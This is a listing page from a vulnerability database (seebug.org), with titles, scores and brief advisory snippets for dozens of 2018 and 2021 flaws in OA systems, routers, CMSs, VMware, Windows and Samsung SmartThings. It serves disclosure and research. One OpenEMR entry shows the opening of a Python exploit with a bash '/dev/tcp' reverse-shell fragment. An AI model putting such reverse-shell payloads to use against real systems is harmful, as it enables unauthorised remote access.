Lucene search
K
SeebugRecent

56796 matches found

seebug.org
seebug.org
added 2021/04/09 12:0 a.m.125 views

齐治堡垒机任意用户登录漏洞

...

0.3AI score
Exploits0
seebug.org
seebug.org
added 2021/04/08 12:0 a.m.94 views

dotCMS 5.2.2 任意文件上传漏洞

...

1AI score
Exploits0
seebug.org
seebug.org
added 2021/04/08 12:0 a.m.45 views

鹏为 CRM E4 SQL注入漏洞

...

0.7AI score
Exploits0
seebug.org
seebug.org
added 2021/04/08 12:0 a.m.97 views

默安蜜罐管理平台未授权问漏洞

...

0.3AI score
Exploits0
seebug.org
seebug.org
added 2021/04/08 12:0 a.m.52 views

泛微OA8 前台SQL注入漏洞

...

0.9AI score
Exploits0
seebug.org
seebug.org
added 2021/04/08 12:0 a.m.50 views

天擎 前台sql注入漏洞

...

0.5AI score
Exploits0
seebug.org
seebug.org
added 2021/04/08 12:0 a.m.373 views

帆软 V9未授权RCE漏洞

...

0.3AI score
Exploits0
seebug.org
seebug.org
added 2021/04/08 12:0 a.m.109 views

XAMPP for Windows 命令执行漏洞

...

1.8AI score
Exploits0
seebug.org
seebug.org
added 2021/04/08 12:0 a.m.26 views

XYCMS 4.6 RCE漏洞

...

0.9AI score
Exploits0
seebug.org
seebug.org
added 2021/04/08 12:0 a.m.44 views

天清入侵防御系统 弱口令漏洞

...

0.3AI score
Exploits0
seebug.org
seebug.org
added 2021/04/08 12:0 a.m.22 views

网御上网行为管理系统 SQL注入漏洞

...

0.5AI score
Exploits0
seebug.org
seebug.org
added 2021/04/08 12:0 a.m.61 views

Windows TCP/IP 拒绝服务漏洞(CVE-2021-24086)

...

5CVSS1.7AI score0.58961EPSS
Exploits7
seebug.org
seebug.org
added 2021/04/08 12:0 a.m.27 views

泛微OA9 未授权RCE漏洞

...

0.6AI score
Exploits0
seebug.org
seebug.org
added 2021/04/08 12:0 a.m.15 views

天擎 越权访问漏洞

...

0.3AI score
Exploits0
seebug.org
seebug.org
added 2021/04/08 12:0 a.m.104 views

和信下一代云桌面VENGD 任意文件上传漏洞

...

0.5AI score
Exploits0
seebug.org
seebug.org
added 2021/04/02 12:0 a.m.99 views

Jellyfin 任意文件读取漏洞(CVE-2021-21402)

GHSL-2021-050: Unauthenticated abritrary file read in Jellyfin - CVE-2021-21402 Jaroslav Lobacevski Coordinated Disclosure Timeline - 2021-03-19: Issue reported to maintainers. - 2021-03-22: Version 10.7.1 with fixes was released. Summary Jellyfin allows unauthenticated arbitrary file read. Produ...

4CVSS0.79855EPSS
Exploits4
seebug.org
seebug.org
added 2021/04/02 12:0 a.m.716 views

FastAdmin 框架RCE漏洞

...

1.2AI score
Exploits0
seebug.org
seebug.org
added 2021/03/31 12:0 a.m.85 views

VMware vRealize Operations Manager 任意文件写入漏洞(CVE-2021-21983)

...

8.5CVSS2.3AI score0.68557EPSS
Exploits9
seebug.org
seebug.org
added 2021/03/31 12:0 a.m.106 views

VMware vRealize Operations Manager SSRF和文件读取漏洞(CVE-2021-21975 CVE-2021-21983)

Description On March 30, 2021, VMware published a security advisory for CVE-2021-21975 and CVE-2021-21983, two chainable vulnerabilities in its vRealize Operations Manager product. CVE-2021-21975 is an unauthenticated server-side request forgery SSRF, while CVE-2021-21983 is an authenticated...

8.5CVSS8.1AI score0.7829EPSS
Exploits12
seebug.org
seebug.org
added 2021/03/30 12:0 a.m.94 views

Apache Druid远程代码执行漏洞(CVE-2021-26919)

...

6.5CVSS1AI score0.22588EPSS
Exploits1
seebug.org
seebug.org
added 2021/03/30 12:0 a.m.181 views

DD-WRT 缓冲区溢出漏洞(CVE-2021-27137)

SSD Advisory – DD-WRT UPNP Buffer Overflow March 24, 2021 SSD Disclosure / Technical Lead Uncategorized TL;DR Find out how a vulnerability in DD-WRT allows an unauthenticated attacker to overflow an internal buffer used by UPNP and trigger a code execution vulnerability. Vulnerability Summary...

0.2AI score
Exploits1
seebug.org
seebug.org
added 2021/03/29 12:0 a.m.517 views

OpenSSL 拒绝服务攻击(CVE-2021-3449)

...

4.3CVSS0.8AI score0.62906EPSS
Exploits3
seebug.org
seebug.org
added 2021/03/29 12:0 a.m.94 views

AfterLogic 多个安全漏洞(CVE-2021-26292 CVE-2021-26293 CVE-2021-26294)

CVE-2021-26292 - Public Full Path Disclosure on AfterLogic Aurora & WebMail Pro WebDAV EndPoint The severity of the issue: Medium Complexity: Easy Affected Products: AfterLogic Aurora, AfterLogic WebMail PRO Authentication: Not required Attacks: Full Path Disclosure Resources : -...

6.8CVSS8.3AI score0.17345EPSS
Exploits3
seebug.org
seebug.org
added 2021/03/26 12:0 a.m.216 views

Microsoft Windows本地提权漏洞(CVE-2021-1732)

CVE-2021-1732: win32kfull xxxCreateWindowEx callback out-of-bounds Mar 25, 2021 • iamelli0t CVE-2021-1732 is a 0-Day vulnerability exploited by the BITTER APT organization in one operation which was disclosed in February this year123. This vulnerability exploits a user mode callback opportunity i...

4.6CVSS0.78376EPSS
Exploits21
seebug.org
seebug.org
added 2021/03/25 12:0 a.m.17 views

WordPress BuddyPress插件远程代码执行漏洞

...

1.2AI score
Exploits0
seebug.org
seebug.org
added 2021/03/25 12:0 a.m.68 views

蓝凌OA EKP 后台SQL注入漏洞(CNVD-2021-01363)

...

0.6AI score
Exploits0
seebug.org
seebug.org
added 2021/03/25 12:0 a.m.60 views

致远OA-ajax.do未授权文件上传漏洞

...

0.8AI score
Exploits0
seebug.org
seebug.org
added 2021/03/22 12:0 a.m.56 views

Apache OFBiz RCE漏洞(CVE-2021-26295)

...

7.5CVSS1.3AI score0.97969EPSS
Exploits9
seebug.org
seebug.org
added 2021/03/22 12:0 a.m.28 views

MessageSolution 邮件归档系统EEA 信息泄露漏洞(CNVD-2021-10543)

...

1.8AI score
Exploits0
seebug.org
seebug.org
added 2021/03/19 12:0 a.m.105 views

MyBB 未授权RCE漏洞(CVE-2021-27889 CVE-2021-27890)

MyBB Remote Code Execution Chain BY SIMON SCANNELL & CARL SMITH Today SonarSource is pleased to share with you a guest contribution to our Code Security blog series. The following blog post is authored by Simon Scannell and Carl Smith -two independent security researchers- joining us in sharing...

6.8CVSS0.4AI score0.1059EPSS
Exploits10
seebug.org
seebug.org
added 2021/03/19 12:0 a.m.93 views

MyBB SQL注入漏洞(CVE-2021-27946)

...

6.5CVSS0.9AI score0.04201EPSS
Exploits5
seebug.org
seebug.org
added 2021/03/18 12:0 a.m.87 views

GitLab 未授权RCE漏洞(CVE-2021-22192)

When rendering wiki content with certain extensions such as .rmd, renderwikicontent will call othermarkupunsafe which will end up calling GitHub::Markup.render from the github-markup gem. Files with any extension can be uploaded by checking out the wiki with git, commiting the files and pushing t...

6.5CVSS9.5AI score0.13108EPSS
Exploits1
seebug.org
seebug.org
added 2021/03/18 12:0 a.m.19 views

Solr未授权任意文件读取漏洞

...

0.9AI score
Exploits0
seebug.org
seebug.org
added 2021/03/12 12:0 a.m.141 views

D-Link DIR-3060 授权RCE漏洞(CVE-2021-28144)

Advisory: D-Link DIR-3060 Authenticated RCE CVE-2021-28144 MARCH 11, 2021 Overview The D-Link DIR-3060 running firmware versions below v1.11b04 is affected by a post-authentication command injection vulnerability. Anybody with authenticated access to a DIR-3060 would be able to run arbitrary syst...

9CVSS8.9AI score0.06009EPSS
Exploits4
seebug.org
seebug.org
added 2021/03/12 12:0 a.m.138 views

F5 Networks 多个漏洞(CVE-2021-22986、CVE-2021-22987、CVE-2021-22988、CVE-2021-22989、CVE-2021-22990、CVE-2021-22991、CVE-2021-22992)

...

10CVSS1.1AI score0.99898EPSS
Exploits22
seebug.org
seebug.org
added 2021/03/11 12:0 a.m.485 views

Git for Visual Studio远程执行代码漏洞(CVE-2021-21300)

...

5.1CVSS1.5AI score0.88644EPSS
Exploits5
seebug.org
seebug.org
added 2021/03/10 12:0 a.m.99 views

Joomla <=3.9.24 管理员权限命令执行(CVE-2021-23132、CVE-2020-24597)

https://github.com/HoangKien1020/CVE-2021-23132...

5CVSS7.1AI score0.06529EPSS
Exploits2
seebug.org
seebug.org
added 2021/03/10 12:0 a.m.69 views

WordPress The Plus Addons for Elementor插件身份验证绕过漏洞(CVE-2021-24175)

...

7.5CVSS1.5AI score0.14462EPSS
Exploits3
seebug.org
seebug.org
added 2021/03/10 12:0 a.m.170 views

D-Link DNS-320 命令注入漏洞(CVE-2020-25506)

...

7.5CVSS0.8AI score0.99968EPSS
Exploits2
seebug.org
seebug.org
added 2018/08/08 12:0 a.m.813 views

Ruby on Rails 路径穿越与任意文件读取漏洞(CVE-2018-3760)分析

漏洞公告 该漏洞由安全研究人员 Orange Tsai发现。漏洞公告来自 https://groups.google.com/forum/!topic/rubyonrails-security/ftJ--l55fM There is an information leak vulnerability in Sprockets. This vulnerability has been assigned the CVE identifier CVE-2018-3760. Versions Affected: 4.0.0.beta7 and lower, 3.7.1 and lower,...

7.6AI score0.26717EPSS
Exploits2
seebug.org
seebug.org
added 2018/08/08 12:0 a.m.611 views

OpenEMR < 5.0.1 - Remote Code Execution

Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example: http://127.0.0.1/openemr." ap.addargument"-u", "--user",...

Exploits0
seebug.org
seebug.org
added 2018/08/01 12:0 a.m.527 views

youke365 V1.0.7 SQL注入

...

1AI score
Exploits0
seebug.org
seebug.org
added 2018/08/01 12:0 a.m.541 views

youke365 V1.0.7 SQL注入2

...

0.8AI score
Exploits0
seebug.org
seebug.org
added 2018/07/31 12:0 a.m.541 views

MetInfo 6.1.0 前台sql注入

...

1.4AI score
Exploits0
seebug.org
seebug.org
added 2018/07/30 12:0 a.m.563 views

Samsung SmartThings Hub video-core Database clips Code Execution Vulnerability(CVE-2018-3919)

Summary An exploitable stack-based buffer overflow vulnerability exists in the retrieval of database fields in video-core's HTTP server of Samsung SmartThings Hub. The video-core process insecurely extracts the fields from the "clips" table of its SQLite database, leading to a buffer overflow on...

0.3AI score0.00946EPSS
Exploits2
seebug.org
seebug.org
added 2018/07/30 12:0 a.m.558 views

Samsung SmartThings Hub video-core samsungWifiScan Code Execution Vulnerability(CVE-2018-3863 - CVE-2018-3866)

Summary Multiple exploitable buffer overflow vulnerabilities exist in the samsungWifiScan handler of video-core's HTTP server of Samsung SmartThings Hub. The video-core process incorrectly extracts fields from a user-controlled JSON payload, leading to a buffer overflow on the stack. An attacker...

0.4AI score0.01827EPSS
Exploits5
seebug.org
seebug.org
added 2018/07/30 12:0 a.m.581 views

Samsung SmartThings Hub video-core clips Code Execution Vulnerability(CVE-2018-3893 - CVE-2018-3897)

Summary Multiple exploitable buffer overflow vulnerabilities exist in the /cameras/XXXX/clips handler of video-core's HTTP server of Samsung SmartThings Hub. The video-core process incorrectly extracts fields from a user-controlled JSON payload, leading to a buffer overflow on the stack. An...

0.2AI score0.01804EPSS
Exploits6
seebug.org
seebug.org
added 2018/07/30 12:0 a.m.597 views

Samsung SmartThings Hub video-core RTSP Configuration Command Injection Vulnerability(CVE-2018-3856)

Summary An exploitable vulnerability exists in the smart cameras RTSP configuration of the Samsung SmartThings Hub. The device incorrectly handles spaces in the URL field, leading to an arbitrary operating system command injection. An attacker can send a series of HTTP requests to trigger this...

0.2AI score0.03444EPSS
Exploits2
seebug.org
seebug.org
added 2018/07/30 12:0 a.m.563 views

Samsung SmartThings Hub video-core REST Request Parser HTTP Pipelining Injection Vulnerabilities(CVE-2018-3907 - CVE-2018-3909)

Summary Multiple exploitable vulnerabilities exist in the REST parser of video-core's HTTP server of the Samsung SmartThings Hub. The video-core process incorrectly handles pipelined HTTP requests, which allows successive requests to overwrite the previously parsed HTTP method, URL and body. An...

9.3AI score0.01435EPSS
Exploits5
seebug.org
seebug.org
added 2018/07/30 12:0 a.m.548 views

Samsung SmartThings Hub video-core credentials videoHostUrl Code Execution Vulnerability(CVE-2018-3872)

Summary An exploitable buffer overflow vulnerability exists in the credentials handler of video-core's HTTP server of Samsung SmartThings Hub. The video-core process incorrectly extracts the videoHostUrl field from a user-controlled JSON payload, leading to a buffer overflow on the stack. An...

0.3AI score0.01753EPSS
Exploits2
Total number of security vulnerabilities56796